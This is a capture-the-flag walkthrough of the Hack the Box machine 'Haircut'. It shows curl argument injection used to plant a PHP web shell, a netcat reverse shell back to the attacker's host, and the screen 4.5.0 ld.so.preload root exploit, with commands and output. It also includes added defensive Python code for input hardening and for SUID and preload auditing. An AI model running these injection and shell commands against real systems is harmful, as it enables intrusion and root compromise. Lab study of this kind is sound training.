Hack the Box – Haircut Walkthrough

Today we're going to solve another CTF machine, "Haircut". It is now a retired box and can be accessed if you're a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, HTTP
  • IP Address: 10.10.10.24
  • Difficulty: Easy

Weakness

  • Curl Command
  • SUID Screen 4.5

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we're going to identify the target and see what we have behind the IP address.

We found just these two ports open after an intense TCP and UDP port scan. So what we do next is enumerate the running services.

Enumerate Directories

There are different tools for directory enumeration, but my favorite one is dirbuster.

Using the lowercase medium wordlist we found an exposed.php file and an uploads directory.

Let’s take a look at exposed.php file.

There's an input field where you can enter a URL and press Go. Let's take a look at what it does.

Let's take a look at the request and response in Burp Suite.

Request

POST /exposed.php HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.24/exposed.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

formurl=http://localhost/test.html&submit=Go

Response

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Thu, 29 Nov 2018 19:05:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1011

Hairdresser checker

Enter the Hairdresser’s location you would like to check. Example: http://localhost/test.html

Requesting Site…

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   223  100   223    0     0   167k      0 --:--:-- --:--:-- --:--:--  217k

I know that the page is running the curl command because of the structure of the response. The carrie.jpg picture also hints at curl, where it says CARRIE CURL.

We know what curl can do.

Exploitation

We can use curl to upload our shell into the uploads directory which we found while enumerating directories.

Let's create a PHP reverse shell, 1337.php.

1337.php

Now we have to run a Python HTTP server to upload our 1337.php file through curl.

python -m SimpleHTTPServer

Now we have to upload our shell into the uploads directory. Since we know the default Apache path /var/www/html/uploads, let's use the curl parameter -o to write the file 1337.php into the uploads directory.

-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php

Request

POST /exposed.php HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.24/exposed.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

formurl=-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php&submit=Go

Now our PHP shell is successfully uploaded into the uploads directory.

Let's access our shell through the browser or Burp.
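Why the -o trick works, and what a fixed exposed.php would have to do instead, as an added example that is not code from the walkthrough or the box: the form value is glued into a shell command, so the shell splits it into extra curl arguments; the hardened version validates the URL, passes an argv list with no shell, and ends option parsing with "--". Function names here (shell_argv, build_curl_argv, fetch) are my own.

```python
"""Added example: exposed.php-style curl call, the flaw and a hardened form."""
import shlex
import subprocess
from urllib.parse import urlsplit


class UnsafeUrl(ValueError):
    """Raised when user input must not reach curl."""


def shell_argv(user_input):
    """Reproduce the flaw: the form value is glued into a shell command, so
    the shell re-splits it into extra curl arguments (e.g. an injected -o)."""
    return shlex.split("curl " + user_input)


def validate_fetch_url(user_input):
    """Accept exactly one absolute http(s) URL with a hostname; reject option
    look-alikes, whitespace/control characters and non-web schemes."""
    url = user_input.strip()
    if not url or url.startswith("-"):
        raise UnsafeUrl("input starts like a curl option")
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url):
        raise UnsafeUrl("whitespace or control characters in URL")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise UnsafeUrl("only absolute http(s) URLs are allowed")
    return url


def is_safe_fetch_url(user_input):
    try:
        validate_fetch_url(user_input)
        return True
    except UnsafeUrl:
        return False


def build_curl_argv(user_input):
    """Hardened form: an argv list (no shell), '--' ends option parsing and
    --proto pins curl to http/https even if a scheme check is bypassed."""
    url = validate_fetch_url(user_input)
    return ["curl", "-sS", "--max-time", "10", "--proto", "=http,https", "--", url]


def fetch(user_input):
    """Run the hardened command; returns curl's stdout (assumes curl is installed)."""
    argv = build_curl_argv(user_input)
    return subprocess.run(argv, capture_output=True, check=False).stdout
```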

Request 1337.php?cmd=ls

GET /uploads/1337.php?cmd=ls HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Thu, 29 Nov 2018 20:24:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31

1337.php bounce.jpg

Now it's time to get a proper reverse shell using netcat.

GET /uploads/1337.php?cmd=nc -e /bin/sh 10.10.14.4 1337 HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

And we got a shell.

Privilege Escalation

After getting user access we move forward by running some scripts which help us go through important information that can lead to root.

Before running scripts I do some manual research and testing, and this time I found an uncommon SUID file.

The first thing I did was run this command.

find / -perm -4000 2>/dev/null

And I found this uncommon file, /usr/bin/screen-4.5.0, which we don't normally see. A Google search turned up an exploit.

GCC is broken on the target machine, so we have to compile the programs locally.

Let's compile.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

Let's upload the compiled C programs to the target machine's /tmp directory.

Let’s move further.

www-data@haircut:/tmp$ cd /etc
cd /etc
www-data@haircut:/etc$ ls -la |grep ld
ls -la |grep ld
-rw-r--r-- 1 root root 24939 May 19  2017 ld.so.cache
-rw-r--r-- 1 root root    34 Jan 27  2016 ld.so.conf
drwxr-xr-x 2 root root  4096 May 16  2017 ld.so.conf.d
drwxr-xr-x 2 root root  4096 May 15  2017 ldap

www-data@haircut:/etc$ umask 000
umask 000
www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
<en -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
www-data@haircut:/etc$ screen -ls
screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@haircut:/etc$ /tmp/rootshell
/tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
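The two things a defender can check for after this escalation, as an added example that is not part of the walkthrough: an SUID binary that is not in a known baseline (this is where screen-4.5.0 stands out) and an /etc/ld.so.preload that is writable or points at a library outside the system library directories, which is exactly what the exploit writes. The baseline set and the sample preload file are constructed for the example; scan_suid mirrors the walkthrough's find command.

```python
"""Added example: audit SUID binaries and /etc/ld.so.preload after Haircut's escalation."""
import os
import stat
import tempfile

# Constructed baseline (a real audit takes this from a clean reference image).
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/newgrp",
}
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/local/lib")


def scan_suid(root="/"):
    """Regular files under root with the setuid bit, like `find / -perm -4000`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(found, baseline=BASELINE_SUID):
    """SUID files that are not in the baseline, e.g. /usr/bin/screen-4.5.0."""
    return sorted(set(found) - set(baseline))


def ld_preload_findings(path="/etc/ld.so.preload"):
    """Flag a preload file that is group/world writable or that names a library
    outside the trusted directories or one that does not exist."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings  # absent is the normal state on most systems
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} is group/world writable")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lib in (line.strip() for line in fh):
            if lib and not lib.startswith(TRUSTED_LIB_DIRS):
                findings.append(f"untrusted preload entry: {lib}")
            if lib and not os.path.exists(lib):
                findings.append(f"dangling preload entry: {lib}")
    return findings


def demo_preload_findings():
    """Run the check on a constructed lookalike of what the exploit writes."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "ld.so.preload")
        with open(p, "w") as fh:
            fh.write("\n/tmp/libhax.so")  # constructed: echo -ne "\x0a/tmp/libhax.so"
        os.chmod(p, 0o666)                # constructed: file created under umask 000
        return ld_preload_findings(p)
```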